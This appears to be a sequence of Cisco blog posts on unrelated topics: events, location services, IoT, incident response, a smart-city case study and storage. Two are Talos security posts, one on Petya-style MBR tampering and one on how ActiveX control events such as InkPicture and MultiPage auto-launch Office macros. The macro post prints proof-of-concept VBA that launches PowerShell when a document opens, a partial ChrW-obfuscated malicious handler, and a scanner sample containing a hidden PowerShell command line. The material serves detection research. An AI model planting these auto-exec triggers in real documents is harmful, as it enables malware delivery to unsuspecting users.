Bruce Maas is CIO and Vice Provost for IT at the University of Wisconsin – Madison, and has been instrumental in developing the security vision for the university. He will talk about the importance of partnership between all stakeholders to achieve effective defenses.
Bob Turner is the Chief Information Security Officer with extensive experience in private industry and the public sector. He is going to talk about how University of Wisconsin – Madison is developing their threat detection and protection capabilities as a path to accomplishing the university’s goals. He will explain how they have partnered within the university, throughout the state and with external partners to develop their architecture. Bob will also discuss key elements introduced in the 2016 Cisco Annual Security Report.
I’ll also show how our latest technology can work in the NIST Cybersecurity Framework, so you can constrain the most advanced attackers and protect your university’s information.
I look forward to seeing you next Thursday morning at EDUCAUSE!
This post was authored by Edmund Brumaghin and Yves Younan
Summary
Ransomware has become increasingly prevalent in the industry, and in many cases, unless there is a publicly released decryptor available, there is often not an easy means of retrieving encrypted files once a system has been infected. In addition to the creation and maintenance of regular system backups, it is increasingly important to focus on a multi-tiered defense-in-depth network architecture in an effort to prevent initial endpoint infection. This is often difficult in an evolving threat landscape where new ransomware families are being developed and deployed seemingly every day by threat actors of varying levels of sophistication.
While many ransomware families encrypt all or part of a target system's files, others, such as Petya, take a different route: they overwrite the Master Boot Record (MBR), force a reboot so that the malicious boot code runs before the operating system, and then encrypt the Master File Table (MFT) of the disk. With the MFT encrypted the filesystem can no longer locate its files, and victims are coerced into paying the threat actors for the key needed to restore access.
To help combat ransomware that attempts to modify the MBR, Talos has released a new tool to the open source community, MBRFilter, a driver that places the MBR into a read-only mode, preventing malicious software from writing to or modifying the contents of this section of the storage device. It addresses only this boot-sector attack path; file-encrypting families are unaffected by it, so it complements rather than replaces backups and layered defenses.
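An MBR integrity check, added here as an example and not part of MBRFilter or any Talos tooling: it parses a 512-byte sector, validates the 0x55AA boot signature and partition table, and compares a SHA-256 of the boot code against a known-good baseline. The two sectors it inspects are constructed inside the script; the disk signature, partition layout and boot stub bytes are placeholders, not captured from a real disk.

```python
"""MBR integrity check. Added example, not part of MBRFilter; the sample
sectors are constructed here, not read from a real disk."""
import hashlib
import struct

SECTOR_SIZE = 512
PART_TABLE_OFF = 446         # four 16-byte partition entries at 446..509
BOOT_SIG = b"\x55\xAA"       # bytes 510..511


def parse_partition_table(mbr: bytes) -> list:
    """Return the four partition entries as dicts (LBA fields are little-endian)."""
    entries = []
    for i in range(4):
        off = PART_TABLE_OFF + 16 * i
        # status(1) CHS-start(3) type(1) CHS-end(3) lba-start(4) sectors(4)
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", mbr, off)
        entries.append({"bootable": status == 0x80, "type": ptype,
                        "lba_start": lba_start, "sectors": sectors})
    return entries


def boot_code_hash(mbr: bytes) -> str:
    """SHA-256 of bytes 0..439: the executable boot code, excluding the
    disk signature at 440..443 and the two reserved bytes before the table."""
    return hashlib.sha256(mbr[:440]).hexdigest()


def check_mbr(mbr: bytes, baseline_hash: str) -> list:
    """Return a list of findings; an empty list means the sector matches the baseline."""
    if len(mbr) != SECTOR_SIZE:
        return ["sector is not 512 bytes"]
    findings = []
    if mbr[510:512] != BOOT_SIG:
        findings.append("missing 0x55AA boot signature")
    if boot_code_hash(mbr) != baseline_hash:
        findings.append("boot code differs from baseline")
    bootable = [e for e in parse_partition_table(mbr) if e["bootable"]]
    if len(bootable) > 1:
        findings.append("more than one partition flagged bootable")
    for e in bootable:
        if e["type"] == 0 or e["sectors"] == 0:
            findings.append("bootable entry with empty type or size")
    return findings


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed MBR: the given boot code, a placeholder disk signature and
    one bootable NTFS (type 0x07) partition starting at LBA 2048."""
    code = boot_code.ljust(440, b"\x00")[:440]
    disk_sig = b"\xDE\xAD\xBE\xEF" + b"\x00\x00"          # placeholder signature + reserved
    part1 = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xFE\xFF\xFF", 2048, 2097152)
    empty = b"\x00" * 16
    return code + disk_sig + part1 + empty * 3 + BOOT_SIG


# Baseline: a typical x86 boot stub prologue (xor ax,ax; mov ss,ax; mov sp,7C00h).
GOOD_MBR = build_sample_mbr(b"\x33\xC0\x8E\xD0\xBC\x00\x7C")
BASELINE = boot_code_hash(GOOD_MBR)

# Simulated boot-sector overwrite: the partition table is left intact, so the
# disk still looks normal until the forced reboot; only the boot code changed.
TAMPERED_MBR = build_sample_mbr(b"\xEB\x04" + b"PETYA" + b"\xFA" * 100)

if __name__ == "__main__":
    print("good:", check_mbr(GOOD_MBR, BASELINE))
    print("tampered:", check_mbr(TAMPERED_MBR, BASELINE))
```

On a live Windows host the same check can be pointed at the raw device (open `\\.\PhysicalDrive0` read-only as Administrator and read the first 512 bytes), with the baseline hash recorded at build time and stored off the machine. The tampered sample shows why the partition-table checks alone are not enough: a Petya-style overwrite keeps the table valid and is only visible in the boot-code hash.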
Over the past few years, location-based services such as Google Maps, Yelp, or OpenTable have become pervasive in our lives. In fact, 70 percent of smartphone customers now use location-based services. But similar location-based services in the enterprise have lagged behind, despite their potential to transform the customer experience across industries such as healthcare, retail, and marketing.
Today Cisco is announcing innovative new technologies that will help bridge that gap and move high-location accuracy services from niche to mainstream in the enterprise. Cisco CMX – our Connected Mobile Experience – is introducing two solutions that deliver on the promise of high-accuracy indoor location for the enterprise.
The first solution, Cisco Beacon Point, uses virtual Bluetooth Low Energy beacons for indoor location services. The solution consists of a single appliance that can generate up to eight virtual beacons, a Cloud-based management dashboard, and SDK that uses the virtual beacons to determine location.
The second solution consists of Cisco Hyperlocation Solution and a client-side application. The enhanced Hyperlocation module and antenna plug into certain Cisco Aironet access points for improved location accuracy. The new client-side application augments that accuracy by leveraging the sensors on the mobile device for Wi-Fi high accuracy and near-real time refresh.
If the potential of indoor location based services is so obvious, then why has the enterprise lagged behind consumer technology?
The answer is actually quite simple. While the technologies might seem the same on the surface, under the hood the consumer and enterprise spaces differ greatly.
Historically, the adoption of enterprise-grade indoor location-based services has been slow because they were seen as too expensive, they lacked the expected accuracy, and the refresh rate lagged. Deployment was seen as complex because indoor location accuracy required an equally accurate infrastructure. And the expectations of customers often outstripped the abilities of the technology.
Closing the gap
Now, with our combination of virtual beacon and Wi-Fi technologies, we’re helping to overcome these issues and close the gap between consumer and enterprise grade services.
This duo of technologies provides some key benefits. First, our virtual beacon solution overcomes the many management challenges of physical BLE beacons, including dead batteries, lost beacons, and complicated placement. Cisco Virtual Beacon Solution beacons are as easily deployed as dropping a pin on a Google map.
Second, no single technology is right for all high accuracy location use cases. Wi-Fi is optimal for analytics while virtual beacons are excellent for applications, such as proximity marketing, that require faster refresh rates.
Using Cisco’s advanced CMX capabilities, the solutions deliver highly accurate location services for the customer’s preferred technology, be it virtual beacon or Wi-Fi, giving Cisco an edge over competitors.
We believe that with today’s announcement Cisco will make high-accuracy services a reality for the enterprise. The technology can finally move from niche to mainstream and become as ubiquitous as outdoor GPS location.
Let us know what you think. Could you use location-based services to reinvent how your business operates? We’re all ears.
Submitted by Kelsey Kusterer Ziser, the Editor of Upskill U at Light Reading
As service providers migrate traditional networks to virtualized networks, it’s no longer enough to only secure the perimeter. Threats from within the network are on the rise as hackers increasingly have access to more robust, inexpensive tools for launching attacks.
Yet just as hackers have more tools at their disposal, operators’ security efforts are being strengthened by machine learning and automated security measures that intelligently adapt and control the network via software-defined networking (SDN) elements. Any new security measure is only as strong as the strategies behind its deployment, and service providers are at a critical stage in re-thinking traditional network security strategies to keep pace with ever-growing and changing threats.
Beginning October 19, Light Reading, in association with Cisco, examines how service providers and data centers must shift their security strategies in light of virtualization and the growing use of open source software in a four-part series at Upskill U. During this free, online series, expert lecturers from AT&T, Tata Communications, Arbor Networks and Princeton University will address how service providers can keep pace with changing threats and take a proactive approach to network security.
Tune in to Upskill U for these exciting lectures in the Security series:
Securing a Virtual World (Wednesday, Oct. 19, 1:00 p.m. ET): Rita Marty, Executive Director, Mobility & Cloud Security, Chief Security Office, AT&T will take a look at how securing a virtual network differs from securing a traditional network, and examine the fundamental technical and mindset changes service providers need to make as they prepare for virtualized networks.
Security: Evolving the Data Center (Friday, Oct. 21, 1:00 p.m. ET): Rasool Kareem Irfan, Head, Telecom & Infrastructure Security Practice, Tata Communications Transformation Services Ltd., addresses how data center security can evolve alongside network transformation and meet stringent security compliances and audits.
Security: Tackling DDoS (Wednesday, Oct. 26, 1:00 p.m. ET): Gary Sockrider, Principal Security Technologist, Arbor Networks, examines how businesses can adopt DDoS countermeasures and redesign their network topology to protect their assets.
Security: The Plusses & Minuses of Open Source Software (Friday, Oct. 28, 1:00 p.m. ET): Nick Feamster, Acting Director, Center for Information Technology Policy, Princeton University, explains both the risks and benefits open source software presents to security measures.
Each 45-minute live session at Upskill U includes a Q&A with speakers, and all courses are recorded and archived so listeners can tune in and reskill anytime. Don’t get left in the dark – let Light Reading’s Upskill U be your guiding light amidst industry-wide changes. Register today for Upskill U’s Security series at www.lightreading.com/upskillu. I’ll see you on the chat boards!
“The only constant is change.” It’s an adage that goes back 2500 years to the Greek philosopher Heraclitus. But never has it been as true as it is today. Technology adoption is growing exponentially, driving change at a dizzying pace. Billions of devices are connecting to networks—most of them the sensors, controllers, and machines that power the Internet of Things (IoT). You probably see the rapid growth of connected devices in your own organization: on the manufacturing floor, in your logistics system, hospital or retail store. But are you seeing the corresponding business impact generated by connected processes and business models enabled by IoT?
Over the last 25 years, organizations have had to reinvent themselves every three to seven years to keep up with the pace of change. Companies that missed one technology transition might scramble to catch up, but missing two meant a slow fade to obscurity, irrelevance, and death. Just think about the rapid evolution from records, to cassettes, to CDs—with each transition creating new winners and losers. Today, the evolution has come full circle as digital streaming services have made any kind of physical media obsolete.
That kind of relentless change threatens the survival of many businesses. According to The Boston Consulting Group, only 19 percent of S&P 500 companies from 50 years ago are still in existence today. How can you ensure the survival of your business?
A new generation of leaders, makers, thinkers, and doers is meeting that change with flexibility and optimism, and transforming it into opportunity. In my upcoming book, Building the Internet of Things, I call these pioneers “Generation IoT.” These are the people who see the transformational power of IoT-driven processes, business models and new revenue streams. They are eager to champion and drive these opportunities in their organizations. These people know that IoT is not just one project, one training session, one change. They know that in order to succeed they and their organizations need to adjust and re-learn, over and over again.
Generation IoT is first defined by openness—open standards, open collaboration, open communications, and open, flexible business models. Members of Generation IoT can be found in IT or operational technology (OT). They can run the plant, or be part of the supply chain. They can be vendors, contractors, or CXOs. They can be young or old. All are willing to learn and take risks, and are good at building virtual teams internally and partnering externally. You can recognize these new winners not by their age or their titles—but by their ability to build and deploy agile, flexible business solutions.
Here’s an example: a decade ago, visionaries talked about mass customization—building mass-produced products to each individual buyer’s specifications. But it was difficult to implement efficiently and proved to be an idea ahead of its time. Today, IoT makes this concept much more practical and cost-effective because information can be shared in real time between every element in the supply chain. Buyers can click on the components they want. Suppliers and logistics providers can see what is being ordered and adjust their scheduling accordingly. Production systems can be retooled as needed. With the information flowing up and down the supply chain, all the necessary materials are at the production line when that customer’s order is being assembled, whether it’s a car or a three-piece suit.
With IoT, mass customization is not just a future possibility—it’s starting to happen. Daihatsu Motor Company is already using 3D printers to offer car buyers 10 colors and 15 base patterns to create their own “effect skins” for car exteriors. Each car rolls off the line customized for that individual buyer.
The key question—and it’s the focus of both my book and this blog series—is how it’s all supposed to happen.
Yes, vision is important. Pointing your organization toward where and how it needs to transform itself is key. But the road to realizing such vision is a multi-year, multi-phased journey and it starts with you successfully tackling one of today’s business problems. A low-risk, small project based on a well-established use-case is all that is needed to get going. Armed with the initial success, you can then pick a more complex problem and an IoT solution that will also have a bigger impact. IoT is a journey.
Along the way, you will break down silos and build understanding and cooperation among IT, OT, supply chain and finance. You will also bring in an ecosystem of partners for a complete, converged solution. The good news is that thousands of your peers have already started on the IoT journey. Based on their experiences, a set of best practices has emerged:
• Have a big vision, but start with a small project using one of the four fast-payback scenarios I outline in my book: connected operations, remote operations, predictive analytics, and predictive maintenance.
• Build your own business case by comparing industry benchmarks with your own total cost of ownership data.
• Get a C-suite sponsor, because you are not implementing one IoT project; you are starting on a journey that will transform your organization, your industry, and your career.
• Build a cross-functional team; you need complementary skills, so maximize the chances of success by building support and buy-in across your entire organization.
Finally, recognize that we’re all relatively new at this. None of us have spent our careers on IoT – not yet. You can be an extremely valuable member of this transformation with the skills you have today. Whether you’re in Generation X, Y, or Z, you can be part of Generation IoT. Stay tuned for my next blog, where I’ll take a closer look at the four fast-payback paths to IoT.
Based on the cybersecurity news proliferating in the mainstream media today – from ransomware incidents to data breaches of massive proportions – it has become clear that organizations need to put security mechanisms in place to protect their IT infrastructure. Organizations commonly use anti-virus, firewall, intrusion prevention and other security technologies to protect themselves; but as we have continued to see, these organizations are not keeping up with both the technology and associated people and processes needed to combat an ever-changing threat landscape.
Additionally, despite the measures organizations are taking, security professionals show mixed levels of confidence in their ability to thwart attackers. According to Cisco’s 2016 Annual Security Report, only 51 percent of survey respondents strongly believe they can detect security weaknesses before they become full-blown incidents, and only 45 percent are confident in their ability to determine the scope of a network compromise and remediate the damage.
Week 3 of National Cyber Security Awareness Month is focused on recognizing and combating cybercrime. If you are responsible for the IT infrastructure of your organization, you must include incident response in your plan to protect your organization. Or, as I prefer to say: your plan must address threat management.
I have previously blogged about a threat management maturity model. The reality is that most organizations today do not have mature threat management practices in place: response to incidents is handled on a case-by-case basis, and often only in direct response to a breach. There is little strategic planning, a lack of consistent processes, and, perhaps more importantly, a lack of continuous monitoring and response. This works for basic use cases, like addressing common malware and supporting compliance, but it isn’t sufficient for more complex cases like ransomware or a mega breach, and it certainly isn’t going to be sufficient if your organization is moving toward a digital business model.
A growing number of organizations are turning to professional expertise to assist with incident response. The percentage of respondents in the 2016 Annual Security Report who outsourced incident response processes grew from 35% to 42% between 2014 and 2015.
I lead the Incident Response Services team at Cisco. We recognize that organizations are at various stages of maturity for threat management, so we’ve developed a portfolio of offers that can help bolster your program while you are building it out. Our portfolio includes:
Emergency Incident Response – This service is targeted for situations when you have experienced a breach. We address immediate concerns and help you build a plan to address the situation, contain damage and work with you on short term and longer term strategies to address underlying issues.
Incident Response Retainer – A growing number of customers are engaging our team by having us on retainer. In this arrangement, you work with a defined set of experts who are familiar with your environment and existing processes and work within defined response times. They augment your team, are ready when you need them, and supplement your own readiness plans.
Proactive Threat Hunting – An increasing number of organizations are not willing to wait for an incident to happen and are asking the question, “Are we already compromised?” We’ll work with you to design a custom hunt, deploy any needed technology, assess your environment to identify existing threats on your network, and then provide a prioritized action plan to increase your cyber hygiene.
Incident response must be a critical component of your security strategy. Educate yourself on what is required to establish a solid incident response program by reading this white paper. Be ready to respond: work with experts in threat management to ensure you’ve got the people, processes and technology in place.
The way that Jaipur looks at it, every few centuries a city needs an upgrade. As one of the biggest tourist destinations in India, Jaipur wanted to transform itself into a more modern, digital city to handle the needs of the people coming into the city. The capital of the state of Rajasthan, Jaipur is also known as the “Pink City” due to its rich cultural history and unique sights. Over 40 million tourists visit Jaipur every year, in addition to the 3.5 million people who call the Pink City home.
If Jaipur truly wanted to be a digital city, it needed a solution robust enough to handle millions of devices on its network. The Jaipur Development Authority (JDA), the organization tasked with taking the city to the next level digitally, naturally turned to Cisco. The JDA explained that they wanted to see three outcomes from the new network:
• Uncompromised safety for all
• A simplified tourist experience
• Digital empowerment for citizens
In order to make sure that everyone and everything was connected at once, the Cisco team began to work on an infrastructure that included: Cisco Aironet 1700 Series indoor access points, Cisco Aironet 1500 Series outdoor access points, Cisco Catalyst 3850 Series Switches among other Cisco products.
The transformation of Jaipur into Digital Jaipur was a success. The plan allowed for advanced IP-based surveillance solutions installed in key locations and Cisco-created smart Wi-Fi hotspots throughout the city for tourists and locals. These new solutions have led to a happier population that now enjoys improved public services and a better user experience.
The future couldn’t be rosier for the Pink City.
To read the entire case study, go here and search for “Jaipur — September 2016”.
Data is growing at an astonishing rate. Trends like cloud, IoT and digitization are imposing higher demands on how data is managed, transported, backed up and restored. Increased business dependence on IT means downtime has more meaningful and tangible impact on business operations. There is almost universally increased focus on disaster recovery and business continuance along with the ability to scale and manage data efficiently.
To alleviate these concerns, Cisco today introduced new storage networking solutions that help customers respond quickly to new business needs, control IT costs, meet compliance requirements and continue operating during disruptions. The new Cisco solutions help customers not only with their business continuance strategy but also with building and scaling the data center of the future, enabling them to manage their businesses cost-effectively. With these announcements, Cisco further cements its market leadership in providing both choice and value for server and storage connectivity.
• SAN Extension/FCIP module on Cisco MDS 9700 Storage Networking modular platforms to build highly available and redundant infrastructure: a high-performance, high-density SAN Extension FCIP module to enable disaster recovery/business continuity solutions.
• Raising the bar of LAN/SAN convergence: enhanced 10/40G Fibre Channel over Ethernet (FCoE) and 25G/50G/100G IP storage networking capabilities on Nexus 9K, in both ACI mode and standalone mode.
• Reduced operational cost via simplified management: the latest Data Center Network Manager (DCNM) release (10.1) extends manageability of SAN/LAN to storage arrays, enabling customers to automate end-to-end provisioning of LAN/SAN and storage devices/arrays.
In late August we began to detect malicious Microsoft Word documents that contained Visual Basic (VB) macro code, and the code appeared to be triggering when the document was opened. However, the documents did not contain any of the standard events used to launch VB macro code on open, such as Document_Open or Auto_Open. Upon closer examination, all the documents contained the ActiveX InkPicture control and a handler for its Painted event. The InkPicture Painted event is triggered when the document is opened, just like the Document_Open event. Using ActiveX controls like InkPicture and the events associated with them, an attacker can create malicious documents that launch VB macro code at document open without using the standard open-event triggers. Security solutions that examine documents and look only for the standard open events are likely to miss documents that use ActiveX controls like InkPicture to launch code when the document is first opened.
Other vendors made note of the use of InkPicture ActiveX controls to launch VB macro code when the document is opened [1] [2].
It was also immediately obvious that InkPicture events other than Painted, like Painting or MouseHover, could be used to launch VB macro code at document open. In addition, Microsoft Office ActiveX controls other than InkPicture could also be used to launch VB macro code at document open.
We created a number of proof-of-concept documents using other events associated with InkPicture to observe how these samples behaved in the Threat Grid sandbox.
For example, this proof-of-concept sample launches powershell.exe using the InkPicture Painting event when the document opens.
Dim Once As Boolean
Private Sub InkPicture1_painting(ByVal hDC As Long, ByVal Rect As InkRectangle, Allow As Boolean)
If Once Then Exit Sub
Once = True
Shell ("powershell.exe")
End Sub
Figure 1: powershell.exe is launched using the InkPicture Painting event when the document opens
This proof-of-concept sample launches powershell.exe using the InkPicture MouseHover event. The event fires when the mouse pointer is over the InkPicture control, so it triggers automatically if the pointer happens to be over the document when it opens, or as soon as the user moves the mouse across the document while it is open.
Dim Once As Boolean
Private Sub InkPicture1_MouseHover()
If Once Then Exit Sub
Once = True
Shell ("powershell.exe")
End Sub
Figure 2: powershell.exe is launched using the InkPicture MouseHover event when the document opens
We added detection for these proof-of-concept samples as well as the means to detect new variants using other ActiveX controls.
Other researchers noted that InkPicture events in addition to Painted, and ActiveX controls other than InkPicture could be used to launch VB macros when a document was opened [3].
We have now begun to detect in-the-wild samples using InkPicture events other than Painted. We have also begun to detect in-the-wild samples using ActiveX controls other than InkPicture to launch VB macro code when a document is opened.
For example, we detected a very small number of documents using the MouseEnter event, which is triggered at document open if the mouse pointer is over the document. The handler builds its command line one character at a time with ChrW() to defeat simple string matching; the first three fragments decode to “cmd.exe /c”, “ PowerShel” and “l (New”, and the listing below is cut off after the third fragment.
Private Sub InkPicture1_MouseEnter()
Dim first As String
Dim second As String
Dim third As String
Dim fourth As String
Dim fifth As String
Dim sixth As String
Dim seventh As String
Dim eighth As String
Dim ninth As String
Dim tenth As String
Dim eleventh As String
Dim twelfth As String
Dim last As String
first = ChrW(99) & ChrW(109) & ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(99)
second = ChrW(32) & ChrW(80) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(83) & ChrW(104) & ChrW(101) & ChrW(108)
third = ChrW(108) & ChrW(32) & ChrW(40) & ChrW(78) & ChrW(101) & ChrW(119) &
Over the weekend of October 15 and 16 we detected a large number of documents using the ActiveX control MultiPage to automatically launch VB macro code at document open. These documents contain the ActiveX MultiPage control and use the associated Layout event. The Microsoft documentation indicates the Layout event triggers when, “… a form, Frame, or Multipage changes size.” [4]
The malicious documents, and proof-of-concept documents we created, demonstrate the MultiPage control’s Layout event will trigger automatically when a document opens.
This is an example of the Layout event handler from a malicious sample (note that the control name is attacker-chosen, so only the _Layout suffix identifies the trigger):
Public Sub Adbvy_Layout(ByVal hdpmymr As Long)
If MdsMR Then Exit Sub
MdsMR = True
gHLPhAD
End Sub
Public Sub gHLPhAD()
On Error GoTo vdvunp
PAaPbaC
tcqmPm BXGkJ
Exit Sub
vdvunp:
End Sub
The ActiveX controls InkPicture and MultiPage are just two of the many ActiveX controls supported by Microsoft Office. Many of these controls have associated events that fire if a document is simply opened and macros are enabled.
Microsoft Office does not run macros from untrusted documents by default, but users can enable them manually, and given the sheer volume of malicious documents with embedded VB macros we see, attackers are clearly finding success with them. We expect attackers to further expand their use of ActiveX controls and to keep evolving their techniques to avoid detection.
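A scanner for extracted VBA source that keys on the event suffix rather than the control name, covering the InkPicture Painted, Painting, MouseHover and MouseEnter handlers, the MultiPage Layout handler and the ChrW() string building shown above. This is an added example, not Talos detection logic; the trigger list, the regular expressions and the macro text it scans are my own constructions, modelled on the samples in this post (the command line in the sample is invented, and the ChrW obfuscation is generated by a helper rather than pasted from a real document).

```python
"""Auto-exec trigger scanner for extracted VBA source. Added example, not
code from the original post; trigger list, regexes and sample macro are
assumptions built from the events described in the text."""
import re

# Classic auto-exec procedure names that most scanners already flag.
STANDARD_AUTOEXEC = {"autoopen", "auto_open", "document_open", "workbook_open",
                     "autoexec", "autoclose", "document_close"}

# ActiveX control events that fire at document open with no user action.
# Control names are attacker-chosen ("Adbvy_Layout"), so match on the suffix only.
ACTIVEX_OPEN_EVENTS = {"painted", "painting", "mousehover", "mouseenter", "layout"}

PROC_RE = re.compile(
    r"^[ \t]*(?:(?:Public|Private|Friend)[ \t]+)?(?:Static[ \t]+)?(?:Sub|Function)[ \t]+([A-Za-z_]\w*)",
    re.IGNORECASE | re.MULTILINE)
CHRW_RUN_RE = re.compile(r"(?:ChrW?\s*\(\s*\d+\s*\)\s*(?:&\s*)?)+", re.IGNORECASE)
CHRW_CODE_RE = re.compile(r"ChrW?\s*\(\s*(\d+)\s*\)", re.IGNORECASE)
SUSPICIOUS_RE = re.compile(r"\b(Shell|CreateObject|WScript\.Shell|powershell(?:\.exe)?|cmd\.exe)\b",
                           re.IGNORECASE)


def find_triggers(vba: str) -> list:
    """Return [(procedure_name, kind)] for every auto-exec entry point found."""
    hits = []
    for name in PROC_RE.findall(vba):
        low = name.lower()                       # VBA identifiers are case-insensitive
        if low in STANDARD_AUTOEXEC:
            hits.append((name, "standard"))
            continue
        _, sep, event = low.rpartition("_")      # "<control>_<event>"
        if sep and event in ACTIVEX_OPEN_EVENTS:
            hits.append((name, "activex:" + event))
    return hits


def decode_chrw_runs(vba: str) -> list:
    """Decode every `ChrW(n) & ChrW(n) & ...` run into the string it builds."""
    decoded = []
    for run in CHRW_RUN_RE.findall(vba):
        codes = [int(c) for c in CHRW_CODE_RE.findall(run)]
        if len(codes) >= 4:                      # skip single-character uses
            decoded.append("".join(chr(c) for c in codes))
    return decoded


def analyze(vba: str) -> dict:
    """Combine trigger, deobfuscation and suspicious-call findings into a verdict."""
    triggers = find_triggers(vba)
    decoded = decode_chrw_runs(vba)
    text = vba + "\n" + "\n".join(decoded)       # scan raw source and decoded strings
    calls = sorted({m.group(1).lower() for m in SUSPICIOUS_RE.finditer(text)})
    if triggers and calls:
        verdict = "suspicious"
    elif triggers or calls:
        verdict = "review"
    else:
        verdict = "clean"
    return {"triggers": triggers, "decoded": decoded, "calls": calls, "verdict": verdict}


def chrw_obfuscate(s: str) -> str:
    """Build the `ChrW(n) & ChrW(n)` form the in-the-wild macro used (for the sample only)."""
    return " & ".join("ChrW(%d)" % ord(c) for c in s)


# Constructed sample: a click handler that needs user action (not flagged), a
# MultiPage Layout handler under an attacker-chosen name, and a ChrW-built command.
SAMPLE_VBA = """
Dim Once As Boolean

Private Sub CommandButton1_Click()
    MsgBox "needs a click, not an auto-exec trigger"
End Sub

Public Sub Adbvy_Layout(ByVal hdpmymr As Long)
    If Once Then Exit Sub
    Once = True
    gHLPhAD
End Sub

Public Sub gHLPhAD()
    Dim first As String
    Dim second As String
    first = %s
    second = %s
    Shell (first & second)
End Sub
""" % (chrw_obfuscate("cmd.exe /c "), chrw_obfuscate("powershell -nop -w hidden"))

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_VBA).items():
        print(key, "=", value)
```

Run it on the output of any VBA extractor (olevba's raw source dump, for example). Adding a new control event is a one-line change to ACTIVEX_OPEN_EVENTS, which is the point: the attacker controls the procedure name, the obfuscation and the payload, but not the event suffix that Office requires for the handler to fire.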
Be sure to tune in to our webinar next week, The Ransomware Threat: New Tactics and How to Fight Back, where experts Eric Hulse and Josh Reynolds of Cisco Research and Efficacy Team (RET) will discuss the ransomware threat and how to fight back. Register to attend here.